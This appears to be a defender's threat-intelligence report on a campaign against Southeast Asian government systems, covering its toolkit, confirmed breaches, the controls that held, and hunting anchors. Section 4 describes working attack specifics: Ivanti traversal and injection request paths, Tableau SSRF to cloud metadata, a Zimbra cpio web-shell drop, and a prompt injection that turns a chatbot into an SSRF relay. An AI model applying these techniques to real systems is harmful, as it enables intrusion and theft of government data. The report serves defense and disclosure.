Contents
Campaign Identifier: SEAsia-Gov-Exploitation-Toolkit-144.172.106.236
Last Updated: August 13, 2026
Threat Level: HIGH
Acknowledgment: Recovery of the MHESI ministry compromise (Section 5.4) drew on file content surfaced through Hunt.io’s AttackCapture platform.
1. Operational Brief
The thing worth your attention here is not the toolkit. It is who was holding it. Four Southeast Asian governments were targeted from a single rented server, three of them compromised, and the operator behind it does not look like an APT. No state fingerprints, no tracked-actor tooling, none of the track-covering you see from a group that knows it is being hunted.
This is a tier I never used to think much about. Not nation-state, not commodity crime, an in-between operator, closer to a cyber-mercenary, reaching into government targets because in this corner of the internet almost nobody is looking. The exposed box sat open to anyone for about a month before we found it.
An operator can squat in a space like this and finish the job long before anyone notices, and that, to me, is the real story. A capable-enough operator got further into four national governments than it had any business getting, and none of it had ever been public. No prior reporting names this operator, its infrastructure, its toolkit, or any of its victims, so the campaign and the controls that blunted it are both documented here for the first time.
Three compromises have evidence physically in hand: Indonesia’s Attorney General document system (Kejaksaan/SIPEDE, 11 correspondence PDFs exfiltrated), a Philippine government science-academy host (svr1.nast.ph, authenticated administrator access), and a private Thai web host. A fourth, Thailand’s Ministry of Higher Education (MHESI), is a probable compromise at MODERATE-HIGH confidence, evidenced by the operator’s own captured validation logs rather than by data we recovered. Everything else the toolkit reached for across Indonesia, Thailand, Malaysia, and the Philippines, including the Thai military mail and army systems, was attempted and did not land. The operator holds credentials for far more than it ever proved it could use.
What actually stopped this operator is the useful part of the case, and it is more sobering than reassuring. One-time passwords held the national archives. A patched Exchange estate turned a historically devastating exploit into a wall of error codes at the Thai air force. Account lockout beat the brute force at a state aircraft maker.
These are ordinary controls, and they are the only reason this was a partial breach instead of a clean sweep of four governments. Turn it around and it is unsettling. An operator this ordinary, with a few tweaks and better recon, could have cracked wide open some of the most protected organizations there are. They were that close.
The lesson is the unglamorous one that keeps proving true. Defense in depth and limiting blast radius do more of the real work here than perimeter prevention. It is not only about keeping people out, it is about how little they can reach once they are in.
The actor stays unattributed. No operator identity artifact was recovered, and no credible technical evidence links this activity to any publicly named threat actor. The two closest publicly tracked Southeast Asian government-targeting actors were checked and positively excluded on every dimension. It is a coherent, distinctive, trackable cluster all the same, so it carries the internal designation UTA-2026-018 (an internal tracking label used by The Hunters Ledger, see the Threat Actor Assessment in Section 10). My own read on the operator, kept separate from the formal attribution, is a resource-constrained but capable individual who is out of their depth against real government targets; the evidence for that actor-type read is in Section 10.2. Naming a specific actor is INSUFFICIENT, and I make no nationality, jurisdiction, or sponsorship claim.
A separate and urgent finding rides along with this one. When the operator’s evidence was captured, the compromised Philippine host svr1.nast.ph was also carrying a GSocket/THC backdoor kit, five malicious cron entries and four daemon-masquerading implants loaded from localroot[.]sbs. It is MODERATE-likely the work of a second, unrelated intruder who was already inside before this operator arrived. One actor’s compromise surfacing out of another’s is rare, and the two are kept strictly apart throughout this report (Section 7). For remediation the distinction does not matter, because operating-system-level persistence on a government server comes off regardless of who planted it, and on that host it was the most immediately actionable item found.
Threat level: HIGH
Rated on confirmed outcomes rather than toolkit breadth. That means government document theft (11 correspondence PDFs from an Attorney General office), authenticated administrator access on a government host, ministry access evidenced by the operator’s own logs, credential possession spanning four countries’ government estates, and a working n-day capability against widely deployed edge products. It is HIGH rather than CRITICAL because the demonstrated reach was far narrower than the toolkit implies, the command-and-control estate was near-silent (one victim callback in two weeks), and the open directory that exposed the operation was pulled in early July 2026. The four national CERTs (Indonesia, Thailand, Malaysia, and the Philippines) were notified before publication.
What to do first
If you defend a government estate in the region, work outside-in, sweeping the operator’s outward-facing indicators first (the VPS IP and the durable operator anchors), then narrowing to the direct host indicators. In priority order:
- Hunt the cron persistence and the highest-value operator signatures, not live C2. The Zimbra web-shell banner
Zimbra Security Monitor v3.1 -- System Diagnosticsand the second-actor cron implants onsvr1.nast.phare durable and worth the time; the six-service C2 estate phoned home exactly once in two weeks, so chasing live beacons is wasted effort. - Reset every credential the operator is confirmed or assessed to hold, across all four countries. Possession is broad even where proven use is narrow, and a credential stays valid until it is rotated.
- Check for and remove GSocket implants of this shape, and block the second-actor loader domain and hashes at the perimeter.
The complete, validated indicators and detection logic ship as separate deliverables: an IOC feed and a full detection package. This report references them rather than embedding them.
2. Campaign Reach and Risk Assessment
Section 1 gave the verdict; this section is the scoreboard behind it, what the operator actually achieved versus what it merely attempted. Because the operator archived its own logs, cookie jars, response dumps, and stolen documents in the same world-readable directory, that scoreboard rests on the operator’s own captured evidence rather than on our inference.
Here is what fell, confirmed with evidence in hand.
| # | Victim | Country | Evidence class | Confidence |
|---|---|---|---|---|
| 1 | Kejaksaan / SIPEDE (Attorney General’s Office) | Indonesia | 11 unique correspondence PDFs exfiltrated (~17.1 MiB), loot in hand | HIGH |
| 2 | svr1.nast.ph (NAST / DOST science academy) |
Philippines | Authenticated Webmin 2.641 admin pages rendered, read-broad but write-limited | HIGH |
| 3 | WordPress @ 119.59.99[.]87 (private host, NOT a government system) |
Thailand | Interactive bash shell captured |
HIGH |
| 4 | MHESI (Ministry of Higher Education, Science, Research & Innovation) | Thailand | Operator’s own validation log: authenticated VPN (×3 accounts) + EMPLOY (SUCCESS) + uniconsubmission (200→302) |
MODERATE-HIGH |
What held is the more useful half, and each one shows positive evidence of non-success. The national archives (SRIKANDI/ANRI, a one-time-password challenge appears to have stopped the operator), Thai military mail (RTAF/RTARF, every Exchange ProxyLogon probe rejected), a district court’s Joomla portal (single-password spray failed; no web shell was deployed on any government host anywhere in the campaign), a state aircraft manufacturer’s e-procurement (brute-force lockout), the Royal Thai Army’s SSH (connection refused), and all five targeted Malaysian systems (no compromise evidenced at all). The operator possesses credentials for many of these systems; validity is unproven for nearly every one. Section 8 examines the specific controls that produced these rejections, because they are the rare, reader-useful output of a case like this.
The reach is far narrower than the toolkit implies. A toolkit built for whole-of-government exploitation across four countries, wielded by an operator with real reverse-engineering skill, produced three compromises with loot, panel, or shell in hand, one further government compromise evidenced one notch lower, and a command-and-control estate that phoned home exactly once in two weeks. For all of it, very little converted into actual access.
2.1 Risk scoring
The overall risk score is 7.1 / 10 (HIGH), and it drives the Threat Level at the top of this report. The rating is anchored to confirmed outcomes, not the toolkit’s breadth.
Full risk scoring: the per-dimension breakdown behind the 7.1
| Risk Dimension | Score (X/10) | Rationale |
|---|---|---|
| Data Exfiltration | 8/10 | Confirmed theft of 11 Attorney-General correspondence PDFs (some in executed/"Signed" state) plus harvested VPN session cookies and broad credential possession across four national government estates. |
| System Compromise | 8/10 | Authenticated administrator access on a government host, authenticated ministry VPN and web-system access (MODERATE-HIGH), and a working unauthenticated n-day capability against five widely deployed edge products. |
| Persistence Difficulty | 7/10 | SSH authorized-key injection tooling and a staged Zimbra web-shell weapon; the co-located second-actor GSocket kit is live OS-level persistence on the shared government host. The operator's own cron-write attempts, however, bounced. |
| Evasion Capability | 7/10 | Bespoke, VirusTotal-unknown scripts evade signature detection; layered public anonymization (free VPN, DPI-resistant proxy, SSH-tunnel relay) defeats IP blocklisting; GIF89a-polyglot PHP web shells hide payloads behind valid image magic bytes. |
| Lateral Movement | 6/10 | Full tunnel, SOCKS5, and multi-hop-proxy capability built and running, but never used to carry victim traffic. Capability is HIGH; demonstrated movement is absent. |
| Detection Challenge | 6/10 | Bespoke tooling with no antivirus family coverage raises the signature bar, but sloppy operational security (world-open directory, plaintext artifacts) and a barely-used C2 estate lower the practical difficulty of catching the activity. |
That weights out at 7.1 / 10, which is HIGH. The dominant contributors are confirmed data exfiltration and confirmed authenticated system compromise. The score sits below CRITICAL because the demonstrated reach is narrow, lateral movement never occurred, and the exposed infrastructure was withdrawn.
What the operator can reach is official government correspondence, civil-servant and administrator credentials, and VPN and session material across national tax, treasury, health and law-enforcement systems. For anyone affected that means unauthorized access to internal correspondence and services, lateral pivoting off harvested credentials, and, on the Philippine host, live operating-system persistence still waiting to be removed.
Rotate every named account the operator holds, whether or not each individual login was independently proven. A credential stays valid until somebody rotates it.
3. Toolkit Classification and Components
This is not a single malware family. It is the complete working toolkit of one hands-on-keyboard operator, recovered because the operator left its staging directory world-readable on a rented server. That distinction shapes everything downstream. There is no self-propagating binary to reverse, no packer to strip, and no builder to fingerprint. Instead there are 99 plain-text scripts, a handful of compiled tunnels, and, most valuable of all, the operator’s own captured results. The full methodology is reconstructable from source rather than inferred from behavior.
| Attribute | Assessment |
|---|---|
| Type | Operator exploitation and staging toolkit (hands-on-keyboard offensive tooling), not a malware family |
| Primary family | None. The exploitation scripts are bespoke and unknown to VirusTotal; the only family-classified binary is commodity chisel (Hacktool.Chisel) |
| Components | 100+ bespoke Python/shell n-day and brute-force scripts; commodity chisel.exe tunnel; a self-built Go multi-agent tunnel and SOCKS5 stack (tunnel-server / tunnel-agent); THC-Hydra v9.5; the Acunetix scanner; a Zimbra CVE-2022-41352 cpio weapon; a credential-phishing server; minimal PHP/JSP web shells |
| Family confidence | HIGH that the toolkit is bespoke operator code (unknown to VirusTotal, hand-written, iteratively versioned); HIGH that chisel is an off-the-shelf commodity build |
| Sophistication | Intermediate, capable but operationally sloppy. Genuine skill (mobile-API cryptographic reverse-engineering, a self-authored Go tunnel, nine-CVE n-day chains) paired with poor operational security (a world-open directory, plaintext artifacts, /tmp staging, an unauthenticated no-TLS SOCKS5 proxy exposed to the public internet) |
| Threat category | Government intelligence collection and access development: document theft plus credential harvesting, cyber-espionage-flavoured |
| Campaign complexity | Multi-tool, single-operator; whole-of-government targeting in Indonesia specifically, narrower target sets in Thailand, Malaysia, and the Philippines |
3.1 The recovered corpus
The corpus spans 99 exploitation and automation scripts, 92 in Python and 7 in shell, one Windows executable, two Linux tunnel binaries, credential and wordlist text files, a Zimbra cpio weapon, minimal PHP and JSP web-shell payloads, and a large body of captured HTML, cookie, and log outcome artifacts. None of the operator binaries are packed, the Go binaries carry an entropy near 6.2, and the scripts are plain source text. A spot-check confirmed the bespoke scripts are unknown to VirusTotal; for hand-written per-target tooling, that absence of any prior record is itself the finding.
Full binary inventory: the durable static anchors and the four load-bearing files
The four load-bearing binaries and their roles:
| File | Type | Role |
|---|---|---|
chisel.exe |
PE32+ Go (9.31 MB) | Commodity Chisel tunnel. Shared by 179 VirusTotal submitters since 2024-10-07, off-the-shelf, not operator-unique. Its hash is worthless for attribution and its VirusTotal relationships are shared-tool noise. |
tunnel-server |
ELF64 Go (6.37 MB) | Self-built multi-agent reverse-tunnel and SOCKS5 server. Internal Go module tunnel-proxy/pkg/mux. Not packed. |
tunnel-agent |
ELF64 Go (5.17 MB) | Paired agent, same self-authored module family. |
cat.sh (second actor) |
Shell script (80.48 KB) | GSocket/THC backdoor loader. Belongs to the separate second-actor finding (Section 7), not to this operator. Served from localroot[.]sbs. |
The durable, attribution-grade static anchors are therefore not the commodity chisel hash but the operator-generated fingerprints described in Section 4.7 and inventoried in Section 13, meaning two chisel server-key fingerprints, the operator’s SSH host-key and authorized-key set, the custom Go tunnel module string, and the operator-authored Zimbra web-shell banner. Those survive an IP change; a shared commodity hash does not.
4. Technical Analysis: The Exploitation Toolkit
The operator’s code shows capability and intent. Whether each capability actually produced a compromise is a separate question, adjudicated in Section 5 against captured outcomes. The two are not the same, and a script, a comment, or an optimistic print() in a success branch is intent, never achievement.
It carried working exploit chains for nine known vulnerabilities across five widely deployed edge products, the Ivanti Connect Secure VPN, Tableau, Zimbra mail, Moodle, and Microsoft Exchange. The standout piece of genuine skill was cryptographic reverse-engineering of Indonesia’s national-archive mobile app, rebuilding its encrypted API by hand to talk to the server directly. Around that sat credential-replay tooling that reached across the whole Indonesian government estate, tax, civil service, health, customs, licensing, and more, plus a self-built Go tunnel stack for moving in and out of victim networks. The mechanics of each are collapsed below for anyone who wants that depth.
Full teardown: the CVE-by-CVE exploitation mechanics, 4.1 to 4.7
4.1 The nine n-day CVEs
The operator’s code references nine CVE identifiers across five edge-facing product families. Seven map cleanly to their stated products; two do not, and one further identifier is fabricated. The table records what the code targets and, critically, the outcome the operator’s own captures show.
| CVE(s) | Product | Target(s) | Outcome per captured evidence |
|---|---|---|---|
| CVE-2023-46805 + CVE-2024-21887 | Ivanti Connect Secure | vpn.mhesi.go.th |
Chain in code; MHESI VPN access evidenced by the operator’s validation log (Section 5) |
| CVE-2022-41352 | Zimbra (Amavis cpio) |
mailweb.lemhannas.go.id |
Weapon in hand (7-path cpio); delivery attempted, success unconfirmed |
| CVE-2020-25627 / -25629 / -25630 | Moodle (XSS / privilege escalation / unauth LFI) | RTAF e-learning and other education platforms | Referenced in code; only anonymous session cookies captured, no exploitation evidenced |
| CVE-2021-26855 (ProxyLogon) | Microsoft Exchange | mail.rtaf.mi.th, mail.rtarf.mi.th |
Confirmed by technique; attempt FAILED: every probe rejected 411/400/404/401 |
| CVE-2024-28149 + CVE-2024-51758 | Labelled “Tableau” by the operator | rbreport(dev).mhesi.go.th |
Technique observed (SSRF / SAML); CVE labels do not correspond to Tableau, see 4.3 |
Three of these families (Ivanti, the Zimbra cpio flaw, and ProxyLogon) carry independently documented histories of mass, indiscriminate in-the-wild exploitation by unrelated threat actors, and all sit in the U.S. CISA Known Exploited Vulnerabilities catalog. That standing history, not this operator, is why any exposed government estate on those products is a perennial target; Section 9 provides that context. The Moodle trio, by contrast, carries no KEV listing and no public exploitation reporting, consistent with the operator’s own null result against Moodle targets.
Exclusion: a fabricated CVE.
CVE-2026-68645appears in the toolkit only as a fake “security patch” string inside thephish_server.pylure page. It is not a real vulnerability and is excluded from the CVE set and the IOC feed. It is called out here so a reader who encounters the string in phishing content does not chase a non-existent flaw.
4.2 The Ivanti Connect Secure chain
The exploit_ivanti.py and _v2.py scripts implement the canonical Ivanti unauthenticated remote-code-execution chain against vpn.mhesi.go.th. The first stage abuses CVE-2023-46805, an authentication-bypass path traversal, by requesting /api/v1/totp/user-backup-code/../../system/system-information, where the ../../ walks out of the loosely protected TOTP endpoint into an administrative one that should require a session. The second stage chains CVE-2024-21887, a command injection, through /api/v1/cac/status?id=$(...), where the $(...) shell-substitution payload executes at appliance privilege.
The _v2 variant is the more consequential one. Rather than only proving the vulnerability, it authenticates to the MHESI VPN with three named accounts, harvests the DSID session cookie each login returns, and writes the cookies to /tmp/vpn_cookies.txt. This is the difference between a proof-of-concept and an access tool, because the script is built to collect and reuse live sessions. Section 5 shows this is exactly the target where the operator’s own validation log records authenticated VPN success.
The consequence worth flagging is the DSID cookies. Unauthenticated code execution on an edge VPN gateway is a foothold on the device that brokers remote access for the whole organization, not one desktop, and the DSID cookies harvested here are reusable authenticated sessions that can outlive a password change. A reset alone does not close that door on the MHESI gateway, the live sessions have to be killed too.
4.3 Tableau: SSRF and SAML, and a CVE-labelling discrepancy worth recording
The auto_exploit.py and autonomous_2h.sh runner drive a two-hour automated loop against the MHESI ecosystem plus GISTDA, Thailand’s space agency, working through the ministry’s open-data portal (CKAN at data.mhesi.go.th, probed with datastore SQL injection and SSRF), its document system, and its GenAI chatbot along the way. Two of its techniques target Tableau Server at rbreport(dev).mhesi.go.th:
- Server-side request forgery (SSRF) through Tableau’s
vizportalAPI:getViewThumbnail?url=andfetchBinary?url=are coerced into fetching the cloud instance-metadata endpoint at169.254.169.254/latest/meta-data/, the standard technique for stealing a cloud host’s temporary credentials from the inside. - A SAML site-takeover technique aimed at authenticating as an arbitrary Tableau site user.
The operator labels these CVE-2024-28149 and CVE-2024-51758. Those identifiers do not correspond to Tableau in public CVE records: CVE-2024-28149 is a stored-XSS flaw in the Jenkins HTML Publisher Plugin, and CVE-2024-51758 is an insecure-storage issue in the Filament PHP admin-panel framework, two entirely unrelated products, neither referencing Tableau, SSRF, or SAML. The closest genuine match for the SAML technique is the much older CVE-2020-6939 (Tableau site-specific SAML account takeover); the SSRF-to-metadata technique matches a February 2024 researcher disclosure that was never assigned a CVE at all.
This report therefore describes the Tableau activity by its observed technique (vizportal SSRF to cloud metadata, and SAML site takeover) rather than by the operator’s CVE labels, which do not survive verification. The discrepancy is a small but genuine detail of the operator’s tradecraft, since the CVE numbers were transcribed loosely, a data point consistent with the broader capable-but-sloppy profile. It also carries a defender lesson. Do not scope Tableau exposure by chasing CVE-2024-28149; scope it by the SSRF and SAML behaviors.
The volume and uniformity of the 99 scripts, together with those confidently-formatted but wrong CVE labels, read to me like LLM-assisted development, common enough in tooling like this by now. I cannot confirm or rule it out from the evidence, and by 2026 AI coding help is so widespread that it barely separates one actor from another, so I note it and leave it out of the attribution weighing in Section 10.
The same loop carries the technique I found most interesting, though not for the reason it first looks. A chatbot on the target estate is coerced, through prompt injection, into acting as an SSRF relay to the cloud-metadata endpoint. The point is not that it is an AI chatbot; nearly all of them are now, so that part is not the headline.
The point is that chatbot traffic is the kind of thing defenders wave through. I have chased plenty of “why did this host reach that odd domain” alerts to ground, and they are almost always benign chatbot backend plumbing, so a lot of teams see that alert and move on. An operator relaying internal requests through exactly that dismissed-as-noise channel is betting on the reflex, and that bet is the real technique here.
It has no clean MITRE ATT&CK technique of its own, so it is captured by its outcome, cloud-metadata credential theft. Lesser-known rather than first-of-its-kind; a prior-art search is warranted before any “first observed” framing.
4.4 The Zimbra delivery weapon
The deliver.py script pairs a spoofed email with a weaponized cpio archive (exploit.cpio, 5,144 bytes, “new ASCII” format, magic 070701) aimed at mailweb.lemhannas.go.id, the mail server of Lemhannas, Indonesia’s National Resilience Institute. The email pretexts as security-monitor@tni[.]mil[.]id (a spoofed Armed Forces sender) to make a malicious “security update” attachment look routine.
The dangerous part is that nobody has to open anything. Zimbra’s Amavis scanner unpacks the attachment on its own just to check it for malware, and on a vulnerable build that unpack is the exploit, so the server infects itself the moment the message lands. The flaw is CVE-2022-41352, where Amavis falls back to the cpio utility to extract archive attachments and cpio does not sanitize path-traversal sequences. The archive contains seven members, each prefixed with ../../../../../../../ so that extraction escapes the scanning sandbox and drops a JSP web shell (a page that calls Runtime.getRuntime().exec(...) to run operating-system commands) into a different candidate Zimbra web root. Seven paths cover the plausible install layouts (/opt/zimbra/jetty/, /opt/zimbra/mailboxd/, and version-specific jetty-distribution directories); the full drop-path list is inventoried in the IOC feed for hunting.
Every copy embeds the decoy banner Zimbra Security Monitor v3.1 -- System Diagnostics. That string is the single highest-value hunting artifact in the whole case. It is operator-authored, has zero legitimate use, appears in every cpio member and any dropped shell.jsp, and ties the web shell directly to the phishing lure’s branding and the spoofed security-monitor@tni.mil.id sender. Delivery was attempted; whether any of the seven drops landed is unconfirmed (Section 5), which is precisely why the drop paths and the banner string are worth hunting on any Zimbra estate in the region.
4.5 SRIKANDI: genuine mobile-API cryptographic reverse-engineering
The largest single cluster in the toolkit (24 sri_* scripts) targets SRIKANDI, Indonesia’s national archival system (srikandi.arsip.go.id / api.arsip.go.id), operated by the national archives agency ANRI. The standout capability here is genuine. The operator extracted the app’s own AES keys (AES-128-ECB for requests, AES-CBC for responses) from a 1.7 MB JavaScript bundle (sri.js), then rebuilt the encrypted request format to speak the API directly.
This is the finding that moved my read of the operator. Going in, I had them pegged as opportunistic, 99 AI-assembled scripts thrown at government targets with a few landing by luck. Hand-extracting the app’s own AES keys from its JavaScript and rebuilding the encrypted request format is not luck. It is someone with a plan who can improvise when a target does not behave, the on-the-fly pivoting a lower-skilled actor never manages because they do not understand the system well enough to try. It raised my estimate of them, and the fact that the whole effort still died on an OTP prompt does not lower it. The skill was real; the target was simply better.
Yet the same cluster reads unmistakably as a debugging campaign that never closed, with five different format guesses at a single create-user endpoint (sri_try_create.py), one-time-password brute-forcing of the obvious 123456 and 000000 values (sri_otp.py), and 403/401 handling branches scattered throughout. As Section 5 documents, no SRIKANDI response, token, cookie, or document appears anywhere in the capture, and one of the operator’s own scripts shows a 202 OTP challenge firing even against the account it believed it had backdoored.
A closely related but separate cluster (sipede_*, sri_mobile_sipede.py) handles the Attorney-General document harvest, and the operator’s own code proves SRIKANDI and SIPEDE are distinct systems with distinct authentication, because the SRIKANDI AES key does not appear in the SIPEDE script. That separation matters for the compromise verdict. SIPEDE fell, SRIKANDI did not, and the two must not be blurred.
4.6 Whole-of-government credential replay
A large family of scripts (top_targets.py, batch_login.py, keycloak_lan.py, siasn_lpse.py, sipd_ahu_insw.py, oss_sikap.py, mail_bpjs.py, djp_login.py, and more) replays possessed credentials across the Indonesian government estate, reaching tax (DJP), treasury (SAKTI/SPAN), civil service (SIASN/BKN), procurement (LKPP), trade and licensing (OSS), law and customs (AHU/INSW), health (BPJS/SATUSEHAT), and regional systems. The scripts speak the right protocols for each, with Keycloak OIDC password grant, CAS ticket, NextAuth/JWKS, and Zimbra SOAP AuthRequest, which is what makes the credential possession credible as a capability.
Full per-system inventory: which government systems the operator holds credentials or a login path for, and how each authenticates
Read every row as possession or a probe, not proven access. Section 5 holds the confirmed compromises; for the systems below, validity is unverified.
| System | Agency / country | What the operator holds | Auth path |
|---|---|---|---|
djponline.pajak.go.id |
Indonesia, DJP tax authority | Possessed NPWP taxpayer credentials | Form login |
sso-siasn.bkn.go.id, swajar-asnpintar.lan.go.id |
Indonesia, SIASN civil service (BKN) + LAN | Possessed NIP credentials | Keycloak OIDC password grant, CAS ticket, JWT |
lpse.kemendag.go.id |
Indonesia, Ministry of Trade e-procurement | Possessed credentials | eProc login |
data.bpjs-kesehatan.go.id, edabu.bpjs-kesehatan.go.id |
Indonesia, BPJS national health insurance | Portal probing | Health-data portal |
webmail.semarangkab.go.id, mail.gorontaloprov.go.id |
Indonesia, provincial / municipal government email | Possessed mailbox credentials | Zimbra SOAP AuthRequest |
ui-login.oss.go.id, sikap.lkpp.go.id |
Indonesia, OSS business licensing + LKPP procurement | Possessed credentials | API / form login |
sipd-ri.kemendagri.go.id |
Indonesia, Home Affairs regional finance (SIPD) | Possessed NIP credentials | Login |
elayanan.ahu.go.id |
Indonesia, Ministry of Law legal-entity admin (AHU) | Login enumeration | not observed |
sso.insw.go.id |
Indonesia, National Single Window (customs / trade) | Possessed credentials | NextAuth / Keycloak callback + JWKS |
immigration.gov.ph |
Philippines, Bureau of Immigration | Unauthenticated WordPress-plugin probing | Elementor / ElementsKit REST abuse |
One structural finding tempers the picture, and it is important for calibrating alarm. top_targets.py, which at first glance looks like the operator’s master credential database, never actually submits its credentials. It performs a GET request and scrapes the login form, so it is a form-mapper and not a validator.
Across the credential-replay family, the operator possesses many credentials but proved very few. This is why I treat broad credential possession as a reset-worthy exposure, meaning every named account should be rotated, while declining to describe most of those systems as compromised. Possession is not proof of a working login.
Catching that also sharpened my read of what the operation was for. The pattern across the toolkit is collect, not break. Scrape credentials, pull documents, hold access, feed the next move. Not credentials harvested for resale, and not a loud operation built to disrupt a government. It reads as intelligence collection, a read rather than a proven motive, and it lines up with everything else about how this operator worked.
4.7 The tunnel stack and the durable operator anchors
The operator ran two tunneling capabilities in parallel. The first is commodity, chisel.exe, an off-the-shelf HTTP-over-WebSocket tunnel. The second is bespoke, a self-authored Go stack (tunnel-server / tunnel-agent) built around the internal module tunnel-proxy/pkg/mux, exposing a control channel on :9443 and a SOCKS5 proxy on :1080, with no authentication and no TLS.
That last detail, an open, unauthenticated SOCKS5 proxy on the public internet, sits on the careless side of this operator. The tunneling choices do too. They wrote their own Go stack, then also grabbed Chisel straight from the source and ran it as-is. That off-the-shelf floor, used without a second thought, is part of why I did not read this as a top-tier actor even with the bespoke work sitting on top of it.
Because the commodity chisel hash is shared by 179 unrelated submitters, it is useless for recognizing this operator. The durable, operator-unique anchors are elsewhere, and they are what defenders should watch for reuse:
- Two
chiselserver-key fingerprints:yW2X8fCVTmfMSpVyrhZQGkSTCfBJBMSyQtgPzCMCfuw=(:8443) andrEVojNCdmii9193KJQL0CQdIcudwm3RW32BKJlUgLT4=(:4443, used for reverse tunnelling). These are operator-generated and survive an IP change. - The operator SSH host-key set on
144.172.106[.]236(ED2551984FDB939…23B7, RSA55F5EE6E…52FA, ECDSAB78E7D40…7D1F), unique to this box in the corpus checked. - The operator SSH authorized-key fingerprint
SHA256:b2sH9INFA/+b9jwMiiTmJoNFaC6SuKI3zc+SDgsBGCE(from a Redis-unauthenticated SSH-key injection keypair, commentroot@ubuntu-Utah-1gb), worth hunting in theauthorized_keysfile of any host, because its presence is a backdoor SSH grant. - The custom Go tunnel module string
tunnel-proxy/pkg/mux, embedded in both ELF binaries. - The Zimbra web-shell banner from Section 4.4.
These anchors, not the commodity hash, are the spine of the detection and hunting guidance in Section 14 and the IOC feed in Section 13.
5. Confirmed Compromises: What the Captured Outcomes Prove
The rule for this section is strict. I only call something a compromise where a captured outcome backs it, a response, a session, a cookie, a rendered authenticated page, or stolen data in hand. A script, a comment, or a hopeful success message is intent, never proof.
I learned to hold that line the hard way on this one. Several things I first wrote down as confirmed were nothing of the sort. BACKDOOR ACTIVE turned out to be a print() line sitting in a success branch that never ran, and what I first read as an OTP bypass was the OTP doing its job and stopping the operator cold.
Both tells sat near the end of scripts I had stopped reading once I thought I understood them. The lesson stuck, and it was to read the whole sample, not the filename and the first half. It is why every verdict below is adjudicated against a captured outcome.
5.1 Kejaksaan / SIPEDE (Indonesia): HIGH, document exfiltration
The most serious finding is also the most unambiguous, because the loot is physically in the capture. The directory contains sipede_docs/: 12 PDF files, 11 of them unique (one duplicate pair, byte-identical), totalling 17,973,103 bytes, of outgoing correspondence and internal memoranda from the Attorney General’s Office correspondence system (sk_Nota_Dinas_*, sk_Biasa_Internal__Eksternal_*, several in a “Signed”/executed state). PDF creation metadata spans 2026-01-23 to 2026-06-10, all stamped +07'00' Western Indonesia Time. A companion cookie jar holds a genuine Laravel session (XSRF-TOKEN plus sipede_session).
A failed request does not produce documents, so the loot settles it. This is confirmed collection against a national law-enforcement body, and it has the shape of espionage rather than theft for resale.
One caveat makes the exposure bigger rather than smaller. The operator’s own sri_mobile_sipede.py carries the comment “Try surat keluar preview for ALL 13 docs” while only 11 or 12 are in hand, so at least one targeted document is unaccounted for. The victim’s real exposure may be slightly wider than what was recovered.
5.2 svr1.nast.ph (Philippines): HIGH, authenticated admin, read-broad but write-limited
The operator got a real console here, not a login page. wm_dash.html and wm_full.html render the fully loaded, authenticated Webmin 2.641 interface with Authentic-Theme, Virtualmin and Cloudmin, and a run of authenticated admin sub-pages follows it (filemin.html, summary.html, scripts_list.html, editweb.html, php_ini.html), all backed by a live Webmin sid session cookie. Administrative read access to a government host is confirmed.
The precise scope matters, and it is narrower than “admin access” alone implies. The access was read-broad but write-limited. The create/edit attempts (cron_create.html, cron_edit.html) are titled “Login to Webmin” (they bounced back to the login form), and the command-execution attempts (wm_shell.html, xt.html, shell.html) returned module error pages. No command execution and no cron persistence by this operator is evidenced on the host. This distinction is essential for Section 7. The live cron implants found on the very same host are a separate actor’s, because this operator’s own writes did not take.
5.3 WordPress at 119.59.99[.]87 (Thailand, private host): HIGH, interactive shell
Three logs (revshell.log and two siblings) capture an interactive bash prompt reaching out from 119.59.99[.]87 to the operator’s ncat listener on TCP/4444, from inside a disguised wp-content/plugins/system-health-monitor/ plugin directory; five further connections from the same source are banner-only. This is a genuine interactive shell, but the host is a private WordPress server, not a government system. It is included as a confirmed compromise for completeness and because it is the only host that ever contacted the operator’s C2 infrastructure (Section 6), but it does not extend the government-victim count.
5.4 MHESI (Thailand): MODERATE-HIGH, from the operator’s own validation log
The operator’s credential-validation output (creds_result.txt and creds_result2.txt) records real HTTP outcomes against MHESI, the Ministry of Higher Education, Science, Research and Innovation:
- VPN, authenticated, three accounts, each returning
HTTP 200with multi-kilobyte session bodies flaggedAUTH PATTERN. - EMPLOY (a named account): an explicit
→ SUCCESSwith a 26,690-byte response. - uniconsubmission (a named account):
HTTP 200→302, the canonical redirect-away-from-login success signature. - rbportal / Kong gateway, rejected (
{"error":"invalid_grant","error_description":"Invalid user credentials"}). A control that held, named in Section 8.
The evidence here is the operator’s captured result (real status codes, real response sizes, a redirect signature, and a live-versus-dead differential proving the tool measured genuine outcomes), not a hardcoded string. It sits at MODERATE-HIGH rather than DEFINITE because the authenticated session content, the post-login HTML dumps themselves, never made it into the capture and cannot be recovered by any means left to us. That gap is permanent, not a deferred analysis step. The defensible statement is that the operator achieved authenticated access to the MHESI VPN and at least the EMPLOY web system (very likely uniconsubmission as well), while the rbportal/Kong gateway rejected them.
5.5 Attempted-and-unproven or attempted-and-failed
These are the marquee targets whose earlier “confirmed” readings were reversed against captured outcomes. They remain worth detecting as attacker behavior, but none may be described as a compromise. They are also, collectively, the evidence base for Section 8’s controls-that-held analysis.
| Target | What was attempted | Outcome artifact showing non-success |
|---|---|---|
| SRIKANDI / ANRI (national archives) | Admin login, backdoor-account creation, OTP brute (123456/000000), document read (24 sri_* scripts) |
No SRIKANDI response, token, cookie, or document anywhere in the capture. “BACKDOOR ACTIVE” is a print() in a success branch, not output; a 202 OTP challenge fires even on the supposedly created account. Their 2FA appears to be what stopped the operator. |
| RTAF / RTARF (Thai military mail, ProxyLogon) | Exchange SSRF chain | Every saved response rejected: 411, 400 MandatoryParameterMissing, 404, 401, or empty. The operator’s own “(POST SSRF works!)” comment is refuted by their own captures. |
pn-samarinda.go.id (district court, Joomla) |
Single-password spray plus FTP web-shell upload | The response body is the Joomla login form; the upload response is 0 bytes. The /images/pwned.php shell sits in an FTP-success branch that never fired. No web shell was deployed on any government host anywhere in the campaign. |
| PT Dirgantara Indonesia (state aircraft manufacturer, e-procurement) | Brute force plus password-reset probe | Four saved attempts are byte-identical at 3,052 bytes: every attempt returned the same login page. |
| RTA (Royal Thai Army, SSH) | THC-Hydra brute against 103.146.204[.]15 |
Connection refused, never reached password-guessing. |
| Malaysia (eGHRMIS, 1GovUC, JPJ, PTPTN, Melaka) | Credentialed login attempts | Every Malaysian reference lives only inside a script; no captured response, cookie, or success marker for any Malaysian host. No compromise evidenced. |
| Lemhannas phishing | phish_server.py fake “Zimbra Security Update” page |
The phishing log holds one operator self-test; the rest is scanner noise. Zero victims harvested. |
